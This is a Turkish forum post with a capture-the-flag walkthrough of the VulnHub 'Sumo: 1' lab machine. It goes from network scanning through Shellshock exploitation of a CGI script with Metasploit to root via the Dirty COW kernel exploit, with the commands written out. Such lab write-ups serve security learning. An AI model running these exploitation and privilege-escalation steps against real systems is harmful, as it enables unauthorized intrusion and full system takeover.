Sumo: 1 CTF Çözümü

R4V3N

Adanmış Üye
3 Tem 2016
6,250
38
26
Kocaeli
İndirme linki: https://www.vulnhub.com/entry/sumo-1,480/

Network Tarama

Netdiscover kullanarak hedef makine için ağımızı tarayarak başlıyoruz.

Kod:
netdiscover

1.png

Hedef makine "192.168.1.104"de aktifmiş. IP'yi Nmap taramasından geçirelim ve çalışan servisleri ve açık portları var mı diye bakalım.

Kod:
nmap -p- -A 192.168.1.104

2.png

Enumeration

Tarama işlemi bize iyi ve kullanışlı bir çok bilgi verdi lakin göze çarpanlar açık olan 22 ve 80 portlar oldu. Araştırmaya 80 portundan başlayalım ve orada neler bulabileceğimize bakalım.

3.png

Bu sayfadan pek bir şey çıkacak gibi gözükmüyor. En iyisi Nikto tarama yapalım ve sayfayı daha fazla kavramaya çalışalım.

Kod:
nikto -h http://192.168.1.104

Nikto taramaları, uygulamada "/cgi-bin/" dizinini arar. İleri bir kontrolde uygulamada shellshock'a karşı açık olduğunu gördük. Exploit'leme zamanı.

5.png

Exploit'leme

Terminal açıp Métasploit framework'ü yüklemek için msfconsole yazalım ve aşağıdaki modülü kullanalım. Bu modül, HTTP_USER_AGENT çevre değişkenini kötücül bir fonksiyon tanımına ayarlayarak Apache webserver'daki CGI script'lerini hedefler.

Kod:
use exploit/multi/http/apache_mod_cgi_bash_env_exec
msf exploit(apache_mod_cgi_bash_env_exec) >set rhost 192.168.1.104
msf exploit(apache_mod_cgi_bash_env_exec) >set lhost 192.168.1.112
msf exploit(apache_mod_cgi_bash_env_exec) >set targeturi /cgi-bin/test
msf exploit(apache_mod_cgi_bash_env_exec) >expoit

6.png

Makinenin işletim sistemini öğrenmek için sysinfo komutunu çalıştırdık ve Ubuntu 12.04 olduğunu öğrendik. Bu tip eski sistemlerin genelde zafiyetli kernelleri olur. DIRTYCOW denemeliyiz.

Ayrıcalık Yükseltme

Exploit'i host makinenin içine indirdim ve sonrasında exploit'i çalıştırmadan evvel derledim. Şimdi şu komut lazım:

Kod:
gcc -pthread c0w.c -o c0w

7.png

Sonrasında o remote shell'deki derlenmiş dosyayı root almak için yükledik.

Kod:
cd /tmp
upload /root/c0w .
./c0w

8.png

Oluşturulan shell ayrıcalıkları yükselticek. Root bayrağını okumak için, bu shell'i düzgün bir shell'e dönüştüreceğiz. Sonrasında Dirty Cow exploit tarafından oluşturulan dosyaları kullanıp root olarak giriş yapacağız.

Kod:
shell
python -c 'import pty; pty.spawn("/bin/sh")
./c0w
/usr/bin/passwd
cd /root
cat root.txt

Böylelikle bayrağımızı yakalamış oluruz.

9.png

Kaynak: https://www.hackingarticles.in/sumo-1-vulnhub-walkthrough/ + https://www.turkhackteam.org/international-forum/1920898-sumo-1-ctf-walkthrough.html
 
Moderatör tarafında düzenlendi:
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.